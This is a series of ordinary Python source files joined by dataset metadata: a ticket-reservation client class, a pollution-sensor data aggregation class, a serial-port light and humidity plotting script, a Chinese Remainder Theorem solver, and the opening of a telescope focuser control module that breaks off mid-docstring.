self._get_crypto_block_for_object(\n method_name='make_reservation',\n interface_object=self\n )\n\n resp_dict = self.get_core_api().purchase_reservation_part_one(\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n customer_data=customer_data,\n return_token=return_token, return_domain=return_domain,\n return_path=return_path, return_with_https=https_string,\n encryption_key=encryption_key, card_data=card_data,\n )\n\n return resp_dict\n\n def purchase_part_two(\n self, returning_token, new_return_token, new_return_path, http_referer,\n http_accept, http_user_agent, callback_data, encryption_key,\n send_confirmation_email=None, results_url=None\n ):\n \"\"\"Second part of the 2 stage purchase process.\n\n See the XML API documentation for more information about the\n purchase process.\n\n Args:\n returning_token (string): The return token from part one.\n new_return_token (string): A new unique token for this call.\n new_return_path (string): The path for the return URL.\n http_referer (string): The user's 'Referer' HTTP header.\n http_accept (string): The user's 'Accept' HTTP header.\n http_user_agent (string): The user's 'User-Agent' HTTP header.\n callback_data (dictionary): All POST and GET variables.\n encryption_key (string): Encryption key for data.\n send_confirmation_email (boolean): Optional, boolean indicating\n whether TSW should send a confirmation email or not.\n results_url (string): Optional, URL of the confirmation page.\n\n Returns:\n Dictionary: If an additional redirect is required, then the\n dictionary will contain an item called\n 'redirect_html_page_data' which is the same as described in\n part one. This redirect must be followed to complete the\n purchase.\n \"\"\"\n\n crypto_block = self.get_crypto_block(\n method_name='start_session',\n password_required=False\n )\n\n resp_dict = self.get_core_api().purchase_reservation_part_two(\n returning_token=returning_token, new_return_token=new_return_token,\n new_return_path=new_return_path, http_referer=http_referer,\n http_accept=http_accept, http_user_agent=http_user_agent,\n callback_data=callback_data, encryption_key=encryption_key,\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n send_confirmation_email=send_confirmation_email,\n results_url=results_url,\n )\n\n if 'trolley' in resp_dict:\n self.transaction_id = resp_dict['trolley'].transaction_id\n self._core_trolley = resp_dict['trolley']\n\n if 'trolley_token' in resp_dict:\n self.trolley_id = resp_dict['trolley_token']\n\n if 'customer' in resp_dict:\n customer = Customer(\n core_customer=resp_dict['customer']\n )\n\n resp_dict['customer'] = customer\n self.customer = customer\n else:\n self.customer = None\n\n if 'self_print_html_pages' in resp_dict:\n self.self_print_urls = resp_dict['self_print_html_pages']\n\n return resp_dict\n\n def purchase_reservation(\n self, customer=None, send_confirmation_email=None,\n ):\n \"\"\"A one stage purchase process that should only be used for purchases\n made on credit.\n\n See the XML API documentation for more information about the\n purchase process. Note the absence of a 'card_data' element\n in the input - this is intentional since the 2-stage purchase process\n (calling purchase_part_one & purchase_part_two) should always be used\n whenever a payment method is required.\n\n Args:\n customer (Customer): Optional, Customer object representing the\n customer making the purchase.\n send_confirmation_email (boolean): Optional, boolean indicating\n whether TSW should send a confirmation email or not.\n\n Returns:\n Dictionary: The result of the attempted purchase\n \"\"\"\n\n if customer:\n customer_data = dict_ignore_nones(**customer._get_dict())\n else:\n customer_data = None\n\n crypto_block = self._get_crypto_block_for_object(\n method_name='make_reservation',\n interface_object=self\n )\n\n resp_dict = self.get_core_api().purchase_reservation(\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n customer_data=customer_data,\n send_confirmation_email=send_confirmation_email,\n )\n\n return resp_dict\n\n @property\n def transaction_status(self):\n \"\"\"Status of the reservation.\"\"\"\n if self._transaction_status is None:\n self.get_details()\n\n if self._transaction_status:\n return self._transaction_status\n else:\n return None\n\n @transaction_status.setter\n def transaction_status(self, value):\n if value is None:\n self._transaction_status = False\n else:\n self._transaction_status = value\n\n @property\n def remote_site(self):\n \"\"\"The domain that the transaction was made on.\"\"\"\n if self._remote_site is None:\n self.get_details()\n\n if self._remote_site:\n return self._remote_site\n else:\n return None\n\n @remote_site.setter\n def remote_site(self, value):\n if value is None:\n self._remote_site = False\n else:\n self._remote_site = value\n\n @property\n def customer(self):\n \"\"\"Customer object representing the customer on the reservation.\"\"\"\n if self._customer is None:\n self.get_details()\n\n if self._customer:\n return self._customer\n else:\n return None\n\n @customer.setter\n def customer(self, value):\n if value is None:\n self._customer = False\n else:\n self._customer = value\n\n @property\n def confirmation_page_html(self):\n \"\"\"HTML of the confirmation page, if it was stored.\"\"\"\n if self._confirmation_page_html is None:\n self.get_details()\n\n if self._confirmation_page_html:\n return self._confirmation_page_html\n else:\n return None\n\n @confirmation_page_html.setter\n def confirmation_page_html(self, value):\n if value is None:\n self._confirmation_page_html = False\n else:\n self._confirmation_page_html = value\n\n def get_details(self):\n \"\"\"Retrieves information about the reservation.\n\n Called internally by several methods/properties, it shouldn't\n be necessary to call this method explicitly.\n\n Returns:\n Reservation: Self, with updated data.\n \"\"\"\n crypto_block = self.get_crypto_block(\n method_name='start_session',\n password_required=False\n )\n\n resp_dict = self.get_core_api().transaction_info(\n transaction_id=self.transaction_id, describe_trolley=True,\n describe_customer=True, describe_external_sale_page=True,\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n )\n\n self.transaction_status = resp_dict['transaction_status']\n self._set_time_left(resp_dict['minutes_left_on_reserve'])\n self.remote_site = resp_dict['remote_site']\n\n self._core_trolley = resp_dict['trolley']\n\n if 'customer' in resp_dict:\n\n lang_str = resp_dict.get('language_list', None)\n\n if lang_str:\n langs = lang_str.split(',')\n\n self.customer = Customer(\n core_customer=resp_dict['customer'],\n languages=langs,\n )\n\n else:\n self.customer = None\n\n if 'sale_page' in resp_dict:\n self.confirmation_page_html = resp_dict['sale_page'].sale_page\n else:\n self.confirmation_page_html = None\n\n if 'self_print_html_pages' in resp_dict:\n self.self_print_urls = resp_dict['self_print_html_pages']\n\n return self\n\n @property\n def self_print_urls(self):\n \"\"\"List of URLs for self print vouchers on this reservation.\"\"\"\n if self._self_print_urls is None:\n self.get_details()\n\n return self._self_print_urls\n\n @self_print_urls.setter\n def self_print_urls(self, value):\n self._self_print_urls = value\n\n def set_confirmation_page(self, html):\n \"\"\"Store the confirmation page HTML in the TSW system.\n\n Args:\n html (string): HTML to store.\n\n Returns:\n Boolean: True if data was saved successfully.\n \"\"\"\n\n crypto_block = self.get_crypto_block(\n method_name='start_session',\n password_required=False\n )\n\n resp_dict = self.get_core_api().save_external_sale_page(\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n transaction_id=self.transaction_id,\n sale_page_type='text', sale_page_subtype='html', sale_page=html,\n )\n\n if resp_dict['saved_this_page'] == 'yes':\n return True\n else:\n return False\n\n @property\n def is_released(self):\n \"\"\"Boolean indicating if the reservation was released.\"\"\"\n if self.transaction_status == 'released':\n return True\n elif self.transaction_status:\n return False\n return None\n\n @property\n def is_purchased(self):\n \"\"\"Boolean indicating if the reservation was purchased successfully.\"\"\"\n if self.transaction_status == 'purchased':\n return True\n elif self.transaction_status:\n return False\n return None\n\n @property\n def is_purchase_successful(self):\n \"\"\"Boolean indicating if the reservation was purchased successfully.\n\n Overrides trolley function.\n \"\"\"\n return self.is_purchased\n\n @property\n def is_reserved(self):\n \"\"\"Boolean indicating if the Reservation object is reserved.\"\"\"\n if self.transaction_status == 'reserved':\n return True\n elif self.transaction_status:\n return False\n return None\n\n @property\n def is_attempting(self):\n \"\"\"Boolean indicating if TSW is currently attempting to reserve.\"\"\"\n if self.transaction_status == 'attempting':\n return True\n elif self.transaction_status:\n return False\n return None\n\n def _create_bundle(self, core_bundle):\n return bundle_objs.Bundle(\n core_bundle=core_bundle,\n self_print_urls=self.self_print_urls,\n **self._internal_settings()\n )\n\n @property\n def need_payment_card(self):\n \"\"\"Boolean indicating if a payment card is required for purchase.\"\"\"\n return resolve_boolean(\n self._need_payment_card\n )\n\n @property\n def needs_email_address(self):\n \"\"\"Boolean indicating if an email address is required for purchase.\"\"\"\n return resolve_boolean(\n self._needs_email_address\n )\n\n @property\n def supports_billing_address(self):\n \"\"\"Boolean indicating if billing address can be provided during\n purchase.\"\"\"\n return resolve_boolean(\n self._supports_billing_address\n )\n\n @property\n def needs_agent_reference(self):\n return resolve_boolean(\n self._needs_agent_reference\n )\n","sub_path":"pyticketswitch/interface_objects/reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":19652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"495248735","text":"# encoding = utf-8\n\nimport pandas as pd\nimport common\n# 导入自开发包\nfrom aggregate_capture import check_functions as chk_f\nfrom aggregate_capture import aggregation_functions as agg_f\nfrom aggregate_capture import consistency_functions as consis_f\n\nfrom log import log\nfrom error_demo.error_code import *\nlogger = log.log_demo()\n\nclass AggregateCapture():\n\n def __init__(self, config, dao, dfs, vargroup_channels, consistency_models):\n \"\"\"\n 初始化关键数据\n :param config: 单例配置项对象\n :param dao: 单例数据库连接对象\n :param dfs: 按照{capture_x:Dataframe}组织的表格,key是capture_x, value是capture的数据\n :param vargroup_channels: 是一个VargroupChannel对象,决定不同的设备的污染物类型及不同污染物的出数通道\n :param consistency_models: 一致性模型\n \"\"\"\n self.dao = dao\n self.config = config\n self.dfs = dfs\n self.vargroup_channels = vargroup_channels\n self.consistency_models = consistency_models\n self.consis_agent = consis_f.ConsistencyAgent(config)\n self.agg_agent = agg_f.AggregationAgent(config)\n self.check_agent = chk_f.CheckAgent(config)\n\n def capture_to_org(self, hour, is_for_minute=False):\n \"\"\"\n 将capture数据聚合为org数据\n 1. 对每种变量的异常数据进行剔除\n 2. 处理多个传感器的数据合并(考虑内容:如果三缺一,三缺二,二缺一怎么处理?)\n 3. 处理从分钟级到小时级的数据合并\n :return: 不做返回,直接将处理好的org数据入库\n \"\"\"\n # 获取需要处理的变量,例如温度、湿度实际上也是需要处理的(暂时还没想好怎么organize)\n tables = self.dfs.keys()\n #初始化一个空的字典,装org数据\n org={}\n for cap_x in tables:\n # logger.info('table {} begin....'.format(cap_x))\n df_cap_x = self.dfs[cap_x]\n\n vg_ids = df_cap_x['VARGROUP_ID'].unique()\n\n org_vargroupid = pd.DataFrame()\n for vg_id in vg_ids:\n var_names = self.vargroup_channels.get_var_names_by_vargroup(vg_id)\n # logger.info('VARGROUP_ID {} begin...... and the vargroup_id has channels: {}'.format(vg_id,var_names))\n full_df = pd.DataFrame()\n for var_name in var_names:\n print(\"正在处理{}表下的{}下的{}污染物......\".format(cap_x,vg_id,var_name))\n channel_header = self.vargroup_channels.get_channels_by_vargroup_and_var(vg_id, var_name)\n # logger.info('var {} begin.... and the var has channel_header {}'.format(var_name,channel_header))\n cur_df = df_cap_x[df_cap_x['VARGROUP_ID'] == vg_id][['DEV_ID', 'CAP_TIME', 'MEA_POINT_ID'] + channel_header]\n\n # 处理异常数据并输出日志\n var_df, _, _ = self.check_agent.clean_capture_data(cur_df, var_name, channel_header)\n\n # 对clean后的cap数据应用一致性模型\n if len(var_df.columns) == 3:\n logger.debug('after clean_capture_data there is no valid data!')\n continue\n else:\n var_df = self.consis_agent.apply_consistency_model(var_df, var_name, channel_header, self.consistency_models)\n if var_df.empty:\n logger.debug('after apply_consistency_model there is no valid data!')\n continue\n else:\n # 聚合多通道数据\n agg_var_df = self.agg_agent.combine_capture_channels(var_df, var_name, channel_header)\n\n # # 聚合分钟级数据到小时\n # ['DEV_ID', 'CAL_TIME', VAR_NAME, COUNT_VAR_NAME]\n # e.g., ['DEV_ID', 'CAL_TIME', 'COUNT_PM25', 'PM25']\n if agg_var_df.empty:\n continue\n if is_for_minute==False:\n hour_var_df = self.agg_agent.agg_minutes_to_hours(agg_var_df, var_name)\n else:\n print(\"不用做小时级别的聚合!\")\n #虚拟聚合(只有几条数据)\n hour_var_df = self.agg_agent.agg_minutes_to_hours(agg_var_df, var_name, hour)\n #合并各个污染物\n full_df = self.agg_agent.merge_df(hour_var_df,full_df)\n org_vargroupid = self.agg_agent.concat_df(full_df,org_vargroupid)\n org[cap_x]=org_vargroupid\n if is_for_minute==False:\n # 回写数据库\n self.dao.write_org_db(org,hour)\n return org\n else:\n #不入数据库\n #返回数据放到内存里待用\n return org\n\n def agg_across_multi_sensors(self, var):\n pass\n","sub_path":"quality_control_platform/aggregate_capture/agg_capture.py","file_name":"agg_capture.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"641066911","text":"import csv\nimport datetime\nimport os\nimport time\n\nimport matplotlib\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport serial\n\nfrom .keypress import KBHit\n\n\ndef tiempo_real(plot_window, logear):\n carpeta = \"data\"\n\n if os.name == \"nt\": # Windows\n ser = serial.Serial(\"COM3\")\n else:\n ser = serial.Serial(\"/dev/ttyUSB0\")\n\n ser.flushInput()\n\n # Abrimos el archivo de log si esta activado el modo log\n if logear:\n fecha_inicio = datetime.datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\")\n archivo = open(f\"{carpeta}/log.csv\", \"w+\", newline=\"\")\n escritor = csv.writer(archivo)\n # IMPORTANTE: Esto es la cantidad de segundos que se quieren visualizar\n # Me creo los datos que van a ir en el eje X e Y, inicialmente son valores cualquiera\n # para rellenar\n y_luz = np.array(np.zeros([plot_window]))\n ahora = datetime.datetime.now()\n x_luz = [\n ahora - datetime.timedelta(0, plot_window - n)\n for n in range(1, plot_window + 1)\n ]\n\n y_hum = np.array(np.zeros([plot_window]))\n x_hum = [\n ahora - datetime.timedelta(0, plot_window - n)\n for n in range(1, plot_window + 1)\n ]\n\n # Enciende el modo interactivo\n plt.ion()\n fig_luz, ax_luz = plt.subplots()\n line_luz, = ax_luz.plot(y_luz)\n scat_luz_on, = ax_luz.plot(y_luz, lw=0, marker=\"^\")\n scat_luz_off, = ax_luz.plot(y_luz, lw=0, marker=\"v\")\n y_luz_on = y_luz[:]\n y_luz_off = y_luz[:]\n x_luz_on = x_luz[:]\n x_luz_off = x_luz[:]\n\n plt.title(\"LUZ\")\n plt.xlabel(\"Instante\")\n plt.ylabel(\"Nivel de Luz [lux]\")\n\n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter(\"%H:%M:%S\"))\n plt.gca().xaxis.set_major_locator(\n mdates.SecondLocator(interval=int(plot_window / 5)))\n\n fig_hum, ax_hum = plt.subplots()\n line_hum, = ax_hum.plot(y_hum)\n scat_hum_on, = ax_hum.plot(y_hum, lw=0, marker=\"^\")\n scat_hum_off, = ax_hum.plot(y_hum, lw=0, marker=\"v\")\n y_hum_on = y_hum[:]\n y_hum_off = y_hum[:]\n x_hum_on = x_hum[:]\n x_hum_off = x_hum[:]\n\n plt.title(\"HUMEDAD\")\n plt.xlabel(\"Instante\")\n plt.ylabel(\"Nivel de Humedad [%]\")\n\n # Config_luzura para que se puedan ver bien las fechas en el eje X\n # En la segunda linea, interval es cada cuantos segundos se pone un label\n # sobre el eje X\n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter(\"%H:%M:%S\"))\n plt.gca().xaxis.set_major_locator(\n mdates.SecondLocator(interval=int(plot_window / 5)))\n\n # humedad en un vaso de agua\n max_humedad = 452\n # 1024 - 452: máxima tasa de humedad con respecto a la referencia\n max_tasa = 572\n # 1024: máximo valor observable por el pin analógico\n\n kb = KBHit()\n while not (kb.kbhit() and kb.getch() == \"q\"):\n try:\n try:\n ser_bytes = ser.readline().decode()\n except UnicodeDecodeError: # Windows\n ser_bytes = ser.readline().decode(\"cp1252\").encode(\"utf-8\")\n\n try:\n decoded_bytes = ser_bytes.rstrip().split()\n except BaseException:\n continue\n\n _, humedad, _, luz, estado = decoded_bytes\n humedad = abs(max_humedad -\n (float(humedad) - max_tasa)) / max_tasa * 100\n luz = float(luz)\n estado = int(estado)\n abierto = \"Abierto\" if estado else \"Cerrado\"\n tiempo = datetime.datetime.now()\n # Bajo al log\n if logear:\n escritor.writerow([\n tiempo.strftime(\"%Y-%m-%d;%H:%M:%S\"), humedad, luz, abierto\n ])\n\n # Actualizo los valores de ambos ejes\n y_luz = np.append(y_luz, luz)\n y_luz = y_luz[1:plot_window + 1]\n x_luz.append(tiempo)\n x_luz = x_luz[1:plot_window + 1]\n\n y_luz_on = np.append(y_luz_on, luz if estado else None)\n x_luz_on = np.append(x_luz_on, tiempo if estado else None)\n x_luz_on = x_luz_on[1:plot_window + 1]\n y_luz_on = y_luz_on[1:plot_window + 1]\n\n y_luz_off = np.append(y_luz_off, luz if not estado else None)\n x_luz_off = np.append(x_luz_off, tiempo if not estado else None)\n x_luz_off = x_luz_off[1:plot_window + 1]\n y_luz_off = y_luz_off[1:plot_window + 1]\n\n y_hum = np.append(y_hum, humedad)\n y_hum = y_hum[1:plot_window + 1]\n x_hum.append(datetime.datetime.now())\n x_hum = x_hum[1:plot_window + 1]\n # Seteo la nueva data\n y_hum_on = np.append(y_hum_on, humedad if estado else None)\n x_hum_on = np.append(x_hum_on, tiempo if estado else None)\n x_hum_on = x_hum_on[1:plot_window + 1]\n y_hum_on = y_hum_on[1:plot_window + 1]\n\n y_hum_off = np.append(y_hum_off, humedad if not estado else None)\n x_hum_off = np.append(x_hum_off, tiempo if not estado else None)\n x_hum_off = x_hum_off[1:plot_window + 1]\n y_hum_off = y_hum_off[1:plot_window + 1]\n\n scat_luz_on.set_data(\n [elem for elem in x_luz_on if elem is not None],\n [l for l in y_luz_on if l is not None],\n )\n scat_luz_off.set_data(\n [elem for elem in x_luz_off if elem is not None],\n [l for l in y_luz_off if l is not None],\n )\n\n scat_hum_on.set_data(\n [elem for elem in x_hum_on if elem is not None],\n [l for l in y_hum_on if l is not None],\n )\n scat_hum_off.set_data(\n [elem for elem in x_hum_off if elem is not None],\n [l for l in y_hum_off if l is not None],\n )\n\n line_luz.set_data(x_luz, y_luz)\n ax_luz.relim()\n ax_luz.autoscale_view()\n\n # Redibujar el grafico\n \"\"\"\n fig_hum.canvas.draw() \n fig_luz.canvas.flush_events()\n \"\"\"\n\n fig_luz.canvas.draw_idle()\n try:\n # plt.pause(0.06)\n fig_luz.canvas.flush_events()\n except: # Windows\n break\n\n fig_luz.autofmt_xdate()\n\n line_hum.set_data(x_hum, y_hum)\n ax_hum.relim()\n ax_hum.autoscale_view()\n\n # Redibujar el grafico\n # fig_hum.canvas.draw()\n # fig_hum.canvas.flush_events()\n\n fig_hum.canvas.draw_idle()\n try:\n # plt.pause(0.05)\n fig_hum.canvas.flush_events()\n except: # Windows\n break\n\n fig_hum.autofmt_xdate()\n\n except KeyboardInterrupt:\n print(\"Keyboard Interrupt\")\n break\n\n if logear:\n fecha_final = datetime.datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\")\n\n archivo.close()\n old_file = os.path.join(carpeta, \"log.csv\")\n new_file = os.path.join(carpeta, f\"{fecha_inicio}__{fecha_final}.csv\")\n os.rename(old_file, new_file)\n\n\n ax_luz.cla()\n ax_hum.cla()\n fig_hum.clf()\n fig_luz.clf()\n plt.close(\"all\")\n del fig_luz\n del fig_hum\n plt.ioff()\n kb.set_normal_term()\n","sub_path":"funcionalidades/visualizar_tiempo_real.py","file_name":"visualizar_tiempo_real.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"42762611","text":"from math import gcd\r\nfrom functools import reduce\r\n\r\n# This program Solves any linear system of congruences for which the moduli are co-prime.\r\n\r\n\r\n# Checks if all elements of a list are coprime with each-other\r\ndef pairwiseCoprime(l):\r\n return not any(gcd(I, J) != 1 for i, I in enumerate(l) for J in l[i + 1:])\r\n\r\n \r\ndef simplify(L):\r\n if len(L) == 2: return L\r\n if len(L) == 4: L = [L[0], (L[2] - L[1]) % L[3], L[3]]\r\n \r\n # Find L[0]*i such that L[0]*i = L[1] (mod L[2])\r\n for i in range(1, L[2]):\r\n if (L[0] * i) % L[2] == L[1]: return [i % L[2], L[2]]\r\n \r\n return [L[1], L[2]]\r\n\r\n \r\ndef CRT(inp):\r\n inp = [simplify(L) for L in inp] # Simplify each item in system\r\n secondProd = reduce(lambda x, y: x * y, [item[1] for item in inp]) # Product of moduli\r\n\r\n if not pairwiseCoprime([L[1] for L in inp]): return False # No Solution\r\n\r\n ans = [secondProd // i1[1] for i1 in inp]\r\n for j in range(len(inp)):\r\n ansJCopy = ans[j]\r\n while ans[j] % inp[j][1] != inp[j][0]: ans[j] += ansJCopy\r\n \r\n return (sum(ans) % secondProd, secondProd) # Returns minimal solution\r\n\r\n# [3,2,7,3] means 3x+2 = 7 (mod 3)\r\n# [3,2,3] means 3x = 2 (mod 3)\r\n# [2,3] means x = 2 (mod 3)\r\n\r\n\r\nLsys = [[1, 2], [1, 3], [1, 5], [3, 7]]\r\nsol = CRT(Lsys)\r\nprint(\"{0} (mod {1})\".format(sol[0], sol[1]))\r\ninput()\r\n\r\n# EXPANSION:\r\n # See https://math.stackexchange.com/questions/120070/chinese-remainder-theorem-with-non-pairwise-coprime-moduli\r\n","sub_path":"Math/Solvers/chineseRemainderTheorem.py","file_name":"chineseRemainderTheorem.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"3308055","text":"\"\"\"\nfocuser_control.py\nJessica A. Evans\n22/10/18\n\n 02/01/19 - Contains all the serial-port control functions for the focusers, and\n the startup/shutdown functions\n\n\n\tCURRENT FUNCTIONS:\n\t----------------------------------------------------------------------\n\tFocuser Control\n\t----------------------------------------------------------------------\n\t- check_config_port_values_for_focuser(config_dict)\n\t\n\t- get_start_end_chars(command)\n\t\n\t- check_focuser_no(x)\n\t\n\t- get_focuser_name(port, x=1)\n\t\n\t- halt_focuser(port, x=1)\n\t\n\t- home_focuser(port, x=1)\n\t\n\t- center_focuser(port, x=1)\n\t\n\t- move_to_position(pos, port, x=1)\n\t\n\t- move_focuser_in(port, x=1, move_speed=1)\n\t\n\t- move_focuser_out(port, x=1, move_speed=1)\n\t\n\t- end_relative_move(port, x=1)\n\n\t----------------------------------------------------------------------\n\tFocuser Configuration/Status Functions\n\t----------------------------------------------------------------------\n\n\t- get_focuser_status(port, x=1)\n\t\n\t- get_focuser_stored_config(port, x=1)\n\t\n\t- set_device_name(port, device_name, x=1)\n\t\n\t- set_device_type(port, x=1, device_type = 'OB')\n\t\n\t- set_temp_comp(port,x=1, temp_comp=False)\n\t\n\t- set_temp_comp_mode(port,x=1 mode='A')\n\t\n\t- set_temp_comp_coeff(port, x=1, mode, temp_coeff_val)\n\t\n\t- set_temp_comp_start_state(port, x=1, temp_comp_start = False)\n\t\n\t- set_backlash_comp(port, x=1, backlash_comp = False)\n\t\n\t- set_backlash_steps(port, x=1,backlash_steps = 10)\n\t\n\t- set_LED_brightness(brightness, port)\n\t\n\t----------------------------------------------------------------------\n\tGroup Observing Functions\n\t----------------------------------------------------------------------\n\t\n\t- focuser_initial_configuration(config_file_name, config_file_loc = \n\t\t'configs/')\n\t\n\t- startup_focuser(config_file_name, config_file_loc = 'configs/')\n\t\n\"\"\"\n\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nFOCUSER CONTROL FUNCTIONS\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\nimport common\nimport serial\nimport logging\nimport time\nimport PLC_interaction_functions as plc\nimport settings_and_error_codes as set_err_codes\n\nfocus_logger = logging.getLogger(__name__)\nfocus_logger.setLevel(logging.INFO)\nfocusHand = logging.FileHandler(filename = set_err_codes.LOGFILES_DIRECTORY+\\\n\t\t\t\t\t\t'focuser.log', mode = 'a')\nfocusHand.setLevel(logging.INFO)\nlogging.Formatter.converter = time.gmtime\nformatter = logging.Formatter('%(asctime)s [%(name)s] %(levelname)s - '\\\n\t\t'%(message)s','%Y-%m-%d_%H:%M:%S_UTC')\nfocusHand.setFormatter(formatter)\nfocus_logger.addHandler(focusHand)\n\n\ndef check_config_port_values_for_focuser(config_dict):\n\t\"\"\"\n\tCheck that the values specified in the config file match what is expected \n\t by the filter wheel manual, includes checks for the baud rate, data bits, \n\t stop bits and parity\n\t \n\t PARAMETERS\n\t \n\t config_file = the config file wth the parameters to be tested\n\t \n\t\"\"\"\n\t\n\t# BAUD RATE\n\tif 'baud_rate' in config_dict.keys():\n\t\tif config_dict['baud_rate'] != 115200:\n\t\t\tfocus_logger.critical('Unexpected baud rate for focuser, 115200 is'\\\n\t\t\t\t' expected')\n\t\t\traise ValueError('Unexpected baud rate for focuser, 115200 is '\\\n\t\t\t\t'expected')\n\telse:\n\t\tfocus_logger.critical('No baud rate found in config file.')\n\t\traise KeyError('No baud rate found in config file.')\n\t\n\t# DATA BITS\n\tif 'data_bits' in config_dict.keys():\n\t\tif config_dict['data_bits'] != 8:\n\t\t\tfocus_logger.critical('Unexpected number for data bits, 8 is'\\\n\t\t\t\t' expected')\n\t\t\traise ValueError('Unexpected number for data bits, 8 is expected')\n\telse:\n\t\tfocus_logger.critical('No data bits number found in config file')\n\t\traise KeyError('No data bits number found in config file')\n\t\n\t# STOP BITS\n\tif 'stop_bits' in config_dict.keys():\n\t\tif config_dict['stop_bits'] != 1:\n\t\t\tfocus_logger.critical('Unexpected number for stop bits, 1 is '\\\n\t\t\t\t'expected')\n\t\t\traise ValueError('Unexpected number for stop bits, 1 is expected')\n\telse:\n\t\tfocus_logger.critical('No stop bits number found in config file')\n\t\traise KeyError('No stop bits number found in config file')\n\t\n\t\n\t# PARITY\n\tif 'parity' in config_dict.keys():\n\t\tif config_dict['parity'] != 'N':\n\t\t\tfocus_logger.critical('Unexpected parity values, \"N\" is expected')\n\t\t\traise ValueError('Unexpected parity values, \"N\" is expected')\n\telse:\n\t\tfocus_logger.critical('No parity values found in config file')\n\t\traise KeyError('No parity values found in config file')\n\n\ndef get_start_end_char(command):\n\t\"\"\"\n\tThe focuser requires a '<' at the begining and a '>' at the end of each \n\t command. This function will add these to any string passed by 'command'.\n\t \n\tPARAMETERS:\n\t\n\t\tcommand - the string command to which <> will be added.\n\t\t\n\tRETURN\n\t\n\t\tfull_command - the full command\n\t\t\n\t\"\"\"\n\n\tfull_command = '<'+str(command)+'>'\n\treturn full_command\n\ndef check_focuser_no(x):\n\t\n\t\"\"\"\n\tMost of the commans for the focuser require the focuser number to be\n\t sent. This can either be set to '1' or '2'. This function just makes sure \n\t that a valid number is sent.\n\t \n\t PARAMETERS:\n\t \n\t\tx = the focuser number to be checked.\n\t\t\"\"\"\n\t\n\tvalid_focuser_number = [1,2]\n\tif x not in valid_focuser_number:\n\t\tfocus_logger.error(str(x) + ' is not a valid focuser number.')\n\t\traise ValueError(str(x) + ' is not a valid focuser number.')\n\telse:\n\t\treturn x\n\n\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nThese assume two focusers connected to one controller, use 'x' parameter to \n\tselect which one, 1=South, 2=North\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\ndef get_focuser_name(port, x=1):\n\t\"\"\"\n\tWill return the user defined nickname for focuser number 'x'.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\t\n\tRETURN:\n\t\tmessage = name for the focuser or a error message\n\t\n\t\"\"\"\n\tcommand = get_start_end_char('F'+str(check_focuser_no(x))+'HELLO')\n\n\tmessage = common.send_command_two_response(command, port)\n\n\treturn message\n\ndef halt_focuser(port, x=1):\n\t\"\"\"\n\tGet focuser 'x' to stop its current motion. If Temperature Compensation was \n\t active, it becomes deactived\n\t \n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\n\tcommand = get_start_end_char('F'+str(check_focuser_no(x))+'HALT')\n\t\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'HALTED':\n\t\tfocus_logger.info('Motion of Focuser '+str(x)+' HALTED')\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef home_focuser(port,x=1):\n\t\"\"\"\n\tAsk focuser 'x' to begin homing routine. Controller will respond with 'H' to\n\t indicate it has started the homing proceedure.\n\t\n\tNeed to first check that the telescope is stowed before homing...\n\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\t\n\t#Need to check to make sure the telescope it stowed before homing the\n\t# focusers. Focusers don't like trying to lift all the camera weight.\n\t\n\ttilt_stat = plc.plc_get_telescope_tilt_status()\n\tif tilt_stat['Tilt_angle'] == \"6h East <= x < RA East limit\" or \\\n\t\ttilt_stat['Tilt_angle'] == \"6h West <= x < RA West limit\":\n\t\n\t\tcommand = get_start_end_char('F'+str(check_focuser_no(x))+'HOME')\n\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'H':\n\t\t\tfocus_logger.info('Focuser '+str(x)+ ' moving to home')\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\telse:\n\t\tfocus_logger.error('Cannot home focuser, telescope is not parked')\n\t\tprint('Cannot home focuser, telescope is not parked')\n\ndef center_focuser(port, x=1):\n\n\t\"\"\"\n\tAsk focuser 'x' to move to the center of it's travel. this is defined as \n\t being half the focusers max position. The max position is defined by the \n\t device type that is selected???. Controller will respond with 'M' to \n\t indicate it has started moving.\n\t\n\t*** Should probably get something to check that it's stopped moving *****\n\t\n\tPARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on the which focuser the command is 